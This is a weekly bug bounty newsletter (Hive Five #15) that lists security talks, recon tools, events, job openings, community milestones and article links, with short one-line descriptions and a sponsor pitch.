🐝 Hive Five #15 – Protect Linux server from hackers, the power of being a misfit, and bee facts

Hi friends,

Greetings from the hive!

I hope you had an awesome week. Mine was filled with several interesting meetings. We did some gardening as a family over the weekend. On Sunday I tuned into NahamSec's stream as usual. This time I was excited to see Shubs demo Kiterunner.

Let's take this week by swarm!

🐝 The Bee's Knees

1. SHELLCON 2017 Pages from a sword-maker’s notebook Vyrus: This talk is an encapsulation of implemented solutions for achieving common requirements when constructing software designed to perform long term covert intelligence gathering.

2. AutoGraphQL: is created just to make the process of authorization testing more enjoyable and easy. By generating queries and schemas automatically. How-to guide.

3. Fundamentals of Bug Bounty Recon: Let's discuss the fundamentals you need to properly understand recon as it relates to security. Article.

4. Protect Linux Server From Hackers: Do you have a linux server and do you know how to prevent getting hacked? In this video LiveOverflow will critically discuss a few best practices. The video can be summarized as: "a lot of fluff, not much use".

5. API Recon with Kiterunner - Hacker Toolbox: Kiterunner is a brand new tool for API Recon which launched last week, and it's INCREDIBLE. Katie was so impressed when testing it out that she had to share it because this will be a game-changer for API recon, seriously.

💌 Sustain-A-Bee

Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

👉 Become a sponsor?

🔥 Buzzworthy

✅ Changelog

Latest additions to my bug bounty Twitter list: coffeejunkiee_, h1_yusuf, h4x0r_dz, haxor31337, ReeverZax, robd4k, sillydadddy.

1. Ffuf 1.3.0 is out: This is a major quality of life release, as it introduces an interactive mode of operation.

2. COSMIC to Arrive in June Release of Pop!_OS 21.04: System76, the creators of the Pop!_OS Linux distribution announced that they will be releasing their own desktop environment based on GNOME with coming June. Video

3. Deno 1.9: This release contains many new features, performance improvements, and bug fixes.

4. Twitter is working on the ability to adjust the duration of the Undo Tweet timer.

📅 Events

1. GitHub Education: Launching the first show of Security Shorts this Tuesday at 7:00 PM IST by @HarishTeens and @Th3lazykid with @harshbothra_.

2. SANS ICS: At the upcoming NewtoCyberSummit, @hacks4pancakes will speak on Landing a Job: Resumes and the Application Process.

3. OWASP Lightning Events 2021: Hacking APIs for beginners on May 12, 2021.

🎉 Celebrate

1. Ahmad Halabi: reached Top 50 Hackers All Time on HackerOne. Amazing!

2. Lupin: One year after his first bounty on HackerOne, triaged by @pxmme1337, he now has a full time position at @ManoMano_FR as a Security Hunter (Red Team). Awesome!

3. YesWeHack: The final leaderboard for WILDCART is here: 1st @honoki, 2nd @ReeverZax, 3rd @Gromak123_Sec. Congrats!

4. Sam Curry: bought a house and might get a cat. Well deserved!

5. Bug Bounty Reports Explained: 18k subs 350k views in 1 year of Bug Bounty Reports Explained channel. So cool!

💰 Jobs

1. Lesley Carhart: Dragos has 4 open IT (not cybersecurity) roles right now Cloud, sysadmin, logistics - on top of open security and Intel roles.

2. Jason Haddix: Ubisoft is looking for a SOC Leader.

3. Job opportunity: Google Web Creators…needs you!: TL;DR: If you’re a prolific content creator on the web, and if you want to help others achieve the same, there’s a new unique part-time job opportunity for you.

4. Calling all public interest tech researchers!: CR’s (Consumer Reports) Digital Lab is accepting applications for paid, non-resident fellows to uncover and solve for consumer harms in the digital world.

5. No Starch Press Foundation Application Process: NSPF will award up to $100,000 USD in grants of no less than $10,000 each to projects that are designed to grow the worldwide hacker community, and support STE(A)M education initiatives - accepting applications until 11:59 p.m. PST on Monday, Sept. 6, 2021.

📰 Articles

1. Duo published an advisory about a 2FA bypass: @KammerlingShaun and team reported it and wrote a write-up

2. The Ultimate Guide to Bugcrowd Incentive Programs: Ever wondered how you can get your hands on some Bugcrowd Swag?

3. Is Vim Really Not For You? A Beginner Guide

4. The Power of Being a Misfit: Speaking with Fredrik Alexandersson STÖK: Have you ever noticed some of the most creative thinkers and individuals seem to be misfits?

5. ‘Counter Strike’ Bug Allows Hackers to Take Over a PC With a Steam Invite: Hackers could take control of victims' computers just by tricking them into clicking on a Steam invite to play Counter Strike: Global Offensive, according to a bug report seen by Motherboard.

📚 Resources

1. Masonhck357: asks for resources on how to best approach a Ruby on Rails application when hacking.

2. Cheatsheet: XSS that works in 2021: This cheat-sheet focuses on up to date and relevant items only.

3. Douglas Day: asks how bugbounty hunters transitioned from webapp to native apps or blockchains?

4. How I got 9000 USD by hacking into iCloud: a vulnerability that they found in ICloud that could allow an attacker to execute malicious code in another iCloud account.

5. Useful Google Sheets Functions for OSINT research: When conducting a large open source research project, you want a way to store your data and share it with collaborators.

🎥 Videos

1. SQL Injection - Lab #7 SQL injection attack, querying the database type and version on Oracle: This lab contains a SQL injection vulnerability in the product category field.

2. How to use the Internet Archive: This introduction video provides a quick introduction to the major collections in the library and provides pointers on how to find books.

3. Videos of 2021 Open Hardware Summit: All the talks from the 2021 Open Hardware Summit are now available as a YouTube playlist.

🎵 Audio

1. Eva: talked to Avast about protecting vulnerable populations, why she care so much about stalkerware, and how privacy ain't dead.

Get $100 to try DigitalOcean - The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

Subscribe to Premium to read the rest.